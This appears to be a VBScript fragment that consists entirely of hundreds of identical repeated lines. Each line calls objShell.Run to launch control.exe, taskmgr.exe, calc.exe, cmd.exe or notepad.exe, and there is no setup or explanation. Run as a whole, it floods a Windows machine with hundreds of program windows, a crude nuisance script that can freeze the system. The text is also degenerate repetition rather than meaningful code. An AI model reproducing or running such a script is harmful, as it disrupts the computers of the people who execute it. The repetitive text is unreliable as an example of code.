objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

